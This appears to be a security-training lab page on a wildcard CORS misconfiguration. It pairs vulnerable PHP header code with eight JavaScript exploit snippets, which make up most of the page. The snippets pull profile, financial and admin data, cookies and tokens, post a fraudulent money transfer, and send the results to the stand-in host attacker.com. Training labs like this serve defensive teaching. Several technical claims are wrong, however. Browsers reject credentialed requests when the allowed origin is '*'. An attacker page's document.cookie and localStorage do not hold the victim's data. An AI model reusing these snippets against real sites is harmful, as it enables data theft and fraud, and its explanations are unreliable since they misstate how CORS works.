Lab 2: CORS with Wildcard Origin

CORS with wildcard origin allowing any domain

Difficulty: Medium

Lab Overview

This lab demonstrates CORS vulnerabilities where the server uses wildcard (*) origin with credentials enabled. This is a critical misconfiguration that allows any domain to make authenticated requests and access sensitive data.

Objective: Exploit wildcard CORS policies to steal sensitive data and perform unauthorized actions.

Vulnerable CORS Headers 
// Vulnerable: Wildcard origin with credentials
function set_cors_headers() {
    header("Access-Control-Allow-Origin: *");
    header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS");
    header("Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, X-Custom-Header");
    header("Access-Control-Allow-Credentials: true");
    header("Access-Control-Expose-Headers: X-Sensitive-Data, X-API-Key, X-User-Info");
    
    // Handle preflight requests
    if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
        http_response_code(200);
        exit();
    }
}
Wildcard CORS Tester
⚠️ Wildcard CORS Warning

This lab demonstrates wildcard CORS vulnerabilities:

  • Access-Control-Allow-Origin: * - Allows any origin
  • Access-Control-Allow-Credentials: true - Allows credentials
  • Access-Control-Expose-Headers - Exposes sensitive headers
  • Access-Control-Allow-Headers: * - Allows all headers
Sensitive API Endpoints

Try these sensitive endpoints:

  • ?action=profile - User profile with PII
  • ?action=financial - Financial data
  • ?action=admin - Admin panel data
API Response
API Response (May contain sensitive data):
Click a button above to test the API
Vulnerability Details
  • Type: CORS with Wildcard Origin
  • Severity: Critical
  • Method: GET/POST
  • Issue: Wildcard origin with credentials
Attack Vectors
  • Data Theft: Steal sensitive user data
  • Financial Fraud: Access financial information
  • Admin Takeover: Access admin panel data
  • Header Exposure: Access exposed headers
Wildcard CORS Exploitation Examples

Use these techniques to exploit wildcard CORS policies:

1. Basic Wildcard CORS Exploitation:
// Exploit wildcard CORS from any domain fetch('http://vulnerable-site.com/api?action=profile', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + localStorage.getItem('token'), 'X-Custom-Header': 'malicious-value' } }) .then(response => { // Access exposed headers const sensitiveData = response.headers.get('X-Sensitive-Data'); const apiKey = response.headers.get('X-API-Key'); const userInfo = response.headers.get('X-User-Info'); console.log('Exposed headers:', { sensitiveData, apiKey, userInfo }); return response.json(); }) .then(data => { console.log('Stolen profile data:', data); // Send to attacker server fetch('http://attacker.com/steal-profile', { method: 'POST', body: JSON.stringify(data) }); });
2. Financial Data Theft:
// Steal financial data via wildcard CORS fetch('http://vulnerable-site.com/api?action=financial', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + localStorage.getItem('token') } }) .then(response => response.json()) .then(data => { console.log('Financial data stolen:', data); // Send financial data to attacker fetch('http://attacker.com/steal-financial', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ timestamp: new Date().toISOString(), financialData: data }) }); });
3. Admin Panel Access:
// Access admin panel data fetch('http://vulnerable-site.com/api?action=admin', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + localStorage.getItem('admin_token') } }) .then(response => response.json()) .then(data => { console.log('Admin data stolen:', data); // Use stolen admin data if (data.admin_panel_url) { window.open(data.admin_panel_url, '_blank'); } // Send admin data to attacker fetch('http://attacker.com/steal-admin', { method: 'POST', body: JSON.stringify(data) }); });
4. POST Request Exploitation:
// Exploit POST requests with wildcard CORS fetch('http://vulnerable-site.com/api', { method: 'POST', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + localStorage.getItem('token'), 'X-Custom-Header': 'malicious-value' }, body: JSON.stringify({ action: 'transfer_money', amount: 10000, to_account: 'attacker-account-12345' }) }) .then(response => response.json()) .then(data => { console.log('Money transfer result:', data); });
5. Header Manipulation:
// Manipulate exposed headers fetch('http://vulnerable-site.com/api?action=profile', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + localStorage.getItem('token'), 'X-Custom-Header': 'malicious-value', 'X-Requested-With': 'XMLHttpRequest' } }) .then(response => { // Access all exposed headers const headers = {}; response.headers.forEach((value, key) => { headers[key] = value; }); console.log('All response headers:', headers); return response.json(); }) .then(data => { console.log('Data with headers:', { data, headers }); });
6. Cross-Domain Cookie Theft:
// Steal cookies via wildcard CORS fetch('http://vulnerable-site.com/api?action=profile', { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json' } }) .then(response => response.json()) .then(data => { // Get cookies from document.cookie const cookies = document.cookie; console.log('Stolen cookies:', cookies); // Send cookies and data to attacker fetch('http://attacker.com/steal-cookies', { method: 'POST', body: JSON.stringify({ data: data, cookies: cookies, timestamp: new Date().toISOString() }) }); });
7. Real-time Data Monitoring:
// Continuous monitoring of sensitive data setInterval(() => { fetch('http://vulnerable-site.com/api?action=financial', { method: 'GET', credentials: 'include', mode: 'cors' }) .then(response => response.json()) .then(data => { console.log('Real-time financial data:', data); // Send to attacker server fetch('http://attacker.com/monitor-financial', { method: 'POST', body: JSON.stringify({ timestamp: new Date().toISOString(), data: data }) }); }); }, 30000); // Every 30 seconds
8. Advanced Header Exploitation:
// Exploit all exposed headers async function exploitAllHeaders() { const endpoints = ['profile', 'financial', 'admin']; for (const endpoint of endpoints) { try { const response = await fetch(`http://vulnerable-site.com/api?action=${endpoint}`, { method: 'GET', credentials: 'include', mode: 'cors', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + localStorage.getItem('token'), 'X-Custom-Header': 'malicious-value' } }); // Extract all headers const headers = {}; response.headers.forEach((value, key) => { headers[key] = value; }); const data = await response.json(); console.log(`${endpoint} data and headers:`, { data, headers }); // Send to attacker fetch('http://attacker.com/steal-all', { method: 'POST', body: JSON.stringify({ endpoint: endpoint, data: data, headers: headers, timestamp: new Date().toISOString() }) }); } catch (error) { console.error(`Failed to exploit ${endpoint}:`, error); } } } exploitAllHeaders();
Real-World Attack Scenarios
Mitigation Strategies
  • Never use wildcard (*) origin with credentials
  • Use specific origins instead of wildcard
  • Implement proper origin validation
  • Use whitelist-based CORS policies
  • Regular security testing and vulnerability assessments
  • Monitor for unusual cross-origin requests
  • Implement proper authentication and authorization
  • Use Content Security Policy (CSP)
  • Implement rate limiting and request validation
  • Audit exposed headers and minimize exposure